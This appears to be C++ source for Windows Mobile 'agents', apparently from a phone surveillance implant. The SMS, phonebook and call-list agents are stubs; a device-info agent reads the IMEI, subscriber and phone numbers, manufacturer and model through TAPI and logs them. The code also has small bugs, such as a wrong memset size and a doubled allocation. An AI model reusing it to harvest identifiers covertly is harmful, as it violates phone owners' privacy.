#include "Agents.h"
#include "Status.h"
#include "Conf.h"
#include "Common.h"
#include <tapi.h>
#include <extapi.h>

DWORD WINAPI SmsAgent(LPVOID lpParam) {
	// Queste strutture dati vanno copiate e incollate in ogni agente
	COMMON_DATA(AGENT_SMS);
	// Fine delle strutture dati obbligatorie

	agents = statusObj->GetAgentsList();

	if(lpParam == NULL || agents == NULL){
		STOP_ME;
	}

	// Comunichiamo al mondo che siamo vivi
	I_AM_ALIVE;

	// Attendiamo che qualcuno ci stoppi
	//WAIT_FOR_STOP;
	//MessageBox(NULL, L"SMS_AGENT: Stopping", L"SMS_AGENT", MB_OK);
	STOP_ME;

	return 0;
}


DWORD WINAPI PhoneBookAgent(LPVOID lpParam) {
	// Queste strutture dati vanno copiate e incollate in ogni agente
	COMMON_DATA(AGENT_PHONEBOOK);
	// Fine delle strutture dati obbligatorie

	agents = statusObj->GetAgentsList();

	if(lpParam == NULL || agents == NULL){
		STOP_ME;
	}

	// Comunichiamo al mondo che siamo vivi
	I_AM_ALIVE;

	STOP_ME;

	return 0;
}

DWORD WINAPI CallListAgent(LPVOID lpParam) {
	COMMON_DATA(AGENT_CALLLIST);

	agents = statusObj->GetAgentsList();

	if(lpParam == NULL || agents == NULL){
		STOP_ME;
	}

	I_AM_ALIVE;

	STOP_ME;
	return 0;
}

DWORD WINAPI DeviceInfoAgent(LPVOID lpParam) {
	COMMON_DATA(AGENT_DEVICE);
	DWORD            rc;
	LINEGENERALINFO LineGeneralInfo;
	HLINE hLine = NULL;
	HLINEAPP hApp;
	LINEEXTENSIONID extid;
	LINEADDRESSCAPS AddressCaps;
	DWORD dwMinVersion = 0x00010003;
	DWORD dwAPIVersion = TAPI_CURRENT_VERSION;
	Log *log = NULL;

	agents = statusObj->GetAgentsList();

	if(lpParam == NULL || agents == NULL){
		STOP_ME;
	}

	I_AM_ALIVE;

	// Inizializziamo le TAPI
	if(lineInitialize(&hApp, g_hInstance, lineCallbackFunc, NULL, &rc) < 0){
		STOP_ME;
	}

	// Definiamo una versione minima
	
	if(lineNegotiateAPIVersion(hApp, 0, dwMinVersion, dwAPIVersion, &dwAPIVersion, &extid) < 0){
		STOP_ME;
	}

	if(lineOpen(hApp, 0, &hLine, dwAPIVersion, 0, 0, LINECALLPRIVILEGE_NONE, 0, NULL) < 0){
		STOP_ME;
	}

	memset(&LineGeneralInfo, 0, sizeof(LineGeneralInfo));
	LineGeneralInfo.dwTotalSize = sizeof(LineGeneralInfo);

	if(lineGetGeneralInfo(hLine, &LineGeneralInfo) < 0){
		lineClose(hLine);
		STOP_ME;
	}

	// Prendiamo il codice IMEI
	LINEGENERALINFO *lpBuffer = (LINEGENERALINFO *)new(std::nothrow) BYTE[LineGeneralInfo.dwNeededSize];

	if(lpBuffer == NULL){
		STOP_ME;
	}

	lpBuffer->dwTotalSize  = LineGeneralInfo.dwNeededSize;

	if(lineGetGeneralInfo(hLine, lpBuffer) < 0){
		lineClose(hLine);
		STOP_ME;
	}

	// Prendiamo l'IMEI
	WCHAR *pImei = NULL;

	if(lpBuffer->dwSerialNumberSize){
		pImei = new(std::nothrow) WCHAR[lpBuffer->dwSerialNumberSize];

		if(pImei != NULL){
			memcpy(pImei, ((BYTE *)lpBuffer) + (lpBuffer->dwSerialNumberOffset), lpBuffer->dwSerialNumberSize);
		}
	}

	// Richiediamo il numero di telefono
	memset(&AddressCaps, 0, sizeof(AddressCaps));
	AddressCaps.dwTotalSize = sizeof(AddressCaps);

	if(lineGetAddressCaps(hApp, 0, 0, dwAPIVersion, 0, &AddressCaps) < 0){
		lineClose(hLine);
		STOP_ME;
	}

	LINEADDRESSCAPS *lpLine = (LINEADDRESSCAPS *)new(std::nothrow) BYTE[AddressCaps.dwNeededSize];

	if(lpLine == NULL){
		lineClose(hLine);
		STOP_ME;
	}

	memset(lpLine, 0, sizeof(AddressCaps.dwNeededSize));
	lpLine->dwTotalSize  = AddressCaps.dwNeededSize;

	if(lineGetAddressCaps(hApp, 0, 0, dwAPIVersion, 0, lpLine) < 0){
		lineClose(hLine);
		STOP_ME;
	}

	lineClose(hLine);

	// Prendiamo il nome del produttore
	WCHAR *pManufacturer = NULL;

	if(lpBuffer->dwManufacturerSize){
		pManufacturer = new(std::nothrow) WCHAR[lpBuffer->dwManufacturerSize];

		if(pManufacturer != NULL){
			memcpy(pManufacturer, ((BYTE *)lpBuffer) + (lpBuffer->dwManufacturerOffset), lpBuffer->dwManufacturerSize);
		}
	}

	// Prendiamo il nome del modello
	WCHAR *pModel = new(std::nothrow) WCHAR[lpBuffer->dwModelSize];

	if(lpBuffer->dwModelSize){
		pModel = new(std::nothrow) WCHAR[lpBuffer->dwModelSize];

		if(pModel != NULL){
			memcpy(pModel, ((BYTE *)lpBuffer) + (lpBuffer->dwModelOffset), lpBuffer->dwModelSize);
		}
	}

	// Prendiamo il numero della linea
	WCHAR *pSubNumber = NULL;

	if(lpBuffer->dwSubscriberNumberSize){
		pSubNumber = new(std::nothrow) WCHAR[lpBuffer->dwSubscriberNumberSize];

		if(pSubNumber != NULL){
			memcpy(pSubNumber, ((BYTE *)lpBuffer) + (lpBuffer->dwSubscriberNumberOffset), lpBuffer->dwSubscriberNumberSize);
		}
	}

	// Prendiamo il numero di telefono
	WCHAR *pNumber = NULL;

	if(lpLine->dwAddressSize){
		pNumber = new(std::nothrow) WCHAR[lpLine->dwAddressSize];

		if(pNumber != NULL){
			memcpy(pNumber, ((BYTE *)lpLine) + lpLine->dwAddressOffset, lpLine->dwAddressSize);
		}
	}

	log = new(std::nothrow) Log();

	if(log == NULL){
		STOP_ME;
	}

	WCHAR wEmpty[] = { L"Empty" };

	if(pManufacturer && log->WriteLog(AGENT_DEVICE, 0, 0, (BYTE *)pManufacturer, lpBuffer->dwManufacturerSize, 0) == TRUE){
		if(pModel)
			log->AppendLog((BYTE *)pModel, lpBuffer->dwModelSize);
		else
			log->AppendLog((BYTE *)wEmpty, WideLen(wEmpty));

		if(pSubNumber)
			log->AppendLog((BYTE *)pSubNumber, lpBuffer->dwSubscriberNumberSize);
		else
			log->AppendLog((BYTE *)wEmpty, WideLen(wEmpty));

		if(pNumber)
			log->AppendLog((BYTE *)pNumber, lpLine->dwAddressSize);
		else
			log->AppendLog((BYTE *)wEmpty, WideLen(wEmpty));

		if(pImei)
			log->AppendLog((BYTE *)pImei, lpBuffer->dwSerialNumberSize);
		else
			log->AppendLog((BYTE *)wEmpty, WideLen(wEmpty));

		log->CloseLog();
	}

	if(lpBuffer)
		delete[] lpBuffer;

	if(lpLine)
		delete[] lpLine;

	if(pImei)
		delete[] pImei;

	if(pManufacturer)
		delete[] pManufacturer;

	if(pModel)
		delete[] pModel;

	if(pSubNumber)
		delete[] pSubNumber;

	if(pNumber)
		delete[] pNumber;

	delete log;

	STOP_ME;
	return 0;
}

VOID FAR PASCAL lineCallbackFunc(DWORD hDevice, DWORD dwMsg, DWORD dwCallbackInstance, 
								 DWORD dwParam1, DWORD dwParam2, DWORD dwParam3) {
	BOOL bLogged = FALSE;

	return;

	/*switch(dwMsg)
	{
		case LINE_APPNEWCALL:
			
			break;
		default: break;
	}*/
}
